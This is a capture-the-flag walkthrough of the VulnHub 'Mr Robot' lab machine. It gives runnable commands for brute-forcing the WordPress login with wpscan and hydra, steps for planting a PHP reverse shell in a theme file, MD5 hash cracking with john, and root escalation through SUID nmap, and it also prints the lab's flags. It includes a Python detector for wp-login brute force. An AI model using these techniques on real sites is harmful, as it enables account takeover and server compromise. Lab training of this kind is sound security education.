Today I am writing about the Mr Robot machine made available by VulnHub. It is indeed a Mr Robot inspired virtual machine and luckily it is a VirtualBox ova and not a VMWare collection. This vulnerable machine is really something else, something special. I have never seen one so convincingly well crafted, and you’ll see what I mean once we get started on getting root.
- Vulnerable machine from vulnhub
- Kali Linux virtual machine (VirtualBox)
To get the virtual machine to run properly I had to set the Network settings to a host-only network vboxnet1 that has a DHCP server enabled.
Information Gathering
Doing an nmap scan of the target reveals that port 80 is open. I do initial nmap scans with a quick nmap -sV -sC -A 10.0.2.16.
It is common practice when a webserver is exposed as a running http service to check the robots.txt file on the server. Going to /robots.txt reveals an entry for key-1-of-3.txt. This leads to the first of 3 keys, found by going to http://10.0.2.16/key-1-of-3.txt. The key is 073403c8a58a1f80d943455fb30724b9, which makes me wonder if it is an MD5 hash.
Attack the WordPress Site
I use nmap to do an initial enumeration of the wordpress service with nmap -sV -p 80 10.0.2.16 --script=http-wordpress-enum.nse and continue on to do some more digging. Doing a wpscan to enumerate the vulnerable plugins (vp) does not really go anywhere.
wpscan --url 10.0.2.4 --enumerate vp
So instead I backtrack for a minute and look at the other files on the webserver. Looking at fsocity.dic, it seems that this could be a password dictionary that can be used for brute forcing. I grab the file with wget http://10.0.2.16/fsocity.dic. After getting the file I want to try brute forcing the wordpress login page. At this stage most people would suggest using hydra, but I’ll use wpscan again, this time with the password flag included.
wpscan --url http://10.0.2.16/wp-login --passwords fsocity.dic -U elliot
Here is the hydra version of the wpscan password brute forcing just for those who are interested.
hydra -L logins.txt -P fsocity.dic 10.0.2.16 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
My wordpress brute forcing efforts pay off and I now have the credentials for an admin of the site.
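For the defender's side of the wp-login.php brute force above, here is an added detection example (my code, not part of the original walkthrough) that parses Apache combined-format access log lines and flags a client posting to wp-login.php in a burst, using the same 200-versus-302 distinction the hydra S=Location condition relies on. The sample log lines and the client addresses in them are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    """Parse one Apache combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev

def detect_wp_login_bruteforce(lines, threshold=5, window_s=60):
    """Flag IPs that POST to /wp-login.php more than `threshold` times inside any
    `window_s`-second window.  A failed login re-renders the form (200); a success
    answers 302 + Location, the same signal hydra's S=Location condition keys on."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev and ev["method"] == "POST" and ev["path"].startswith("/wp-login.php"):
            by_ip[ev["ip"]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for first in evs:
            # Sliding window anchored at each attempt: how many attempts follow within window_s?
            burst = [e for e in evs if 0 <= (e["ts"] - first["ts"]).total_seconds() <= window_s]
            if len(burst) > threshold:
                findings[ip] = {"attempts": len(evs), "burst": len(burst),
                                "success": any(e["status"] == 302 for e in evs)}
                break
    return findings

# Constructed sample log (not captured from the machine): six failed logins and then
# one success from one client within 31 seconds, plus a single failed login from another.
def _line(ip, sec, status, ua="WPScan"):
    return (f'{ip} - - [01/Jan/2016:10:00:{sec:02d} +0000] "POST /wp-login.php HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')

SAMPLE_LOG = [_line("10.0.2.15", s, 200) for s in range(0, 30, 5)] + [
    _line("10.0.2.15", 31, 302),
    _line("10.0.2.99", 40, 200, ua="Mozilla/5.0"),
]
```

Run against a real access log, the same function takes the file's lines; the 302 flag is what turns "someone is guessing" into "someone probably got in".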
Put a Shell In the WordPress site’s PHP
WordPress runs PHP, correct? Then it can execute the PHP that you want it to. You paste in the code of a web shell, for example the php-reverse-shell found under /usr/share/webshells/php on Kali. You can also use p0wny.
Once the PHP is in the archive.php file you execute it by sending a web request to /wp-content/themes/twentyfifteen/archive.php, and that gets a shell back to a netcat listener.
You can also place the shell code into 404.php.
After you edit the 404.php file to include the php reverse shell code there are two more steps to take. First, set up a netcat listener on the port you configured in the uploaded reverse shell code. Second, call the script. I literally got a shell back by calling http://10.0.2.16/anything!
With the admin credentials in hand, I go to http://10.0.2.16/wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen and replace the PHP with the shell. I get mine from pentestmonkey, but Kali ships suitable shells in /usr/share/webshells/php. Lost? You can also get to the editor page by going to Appearance, then Editor.
Privilege Escalation
Moving around I see there is a home directory in /home/robot.
$ cd home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
I proceed to crack the hash, which is obviously an MD5 hash according to the filename, using john. I get this done with a quick john --format=raw-md5 crackme.txt. Now I have the password, abcdefghijklmnopqrstuvwxyz.
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
After switching to the robot user with the cracked password, I look around for the second flag. This is, after all, a CTF walkthrough, right?
robot@linux:~$ whoami
whoami
robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
To find the third flag some more privilege escalation is needed. The technique I use is to look for files where the SUID bit is set. With the SUID bit set on a file (shown by an s in place of the owner's execute x in the permission bits), a user can run the binary with the permissions of the file's owner. On this machine nmap happens to be one of those cases, which means I can run nmap as root.
Googling nmap SUID exploit shows a million examples and I quickly employ one. The exploit is specifically to use the --interactive flag in order to then escape the program into a bash shell. This bash shell will then have the privileges of root.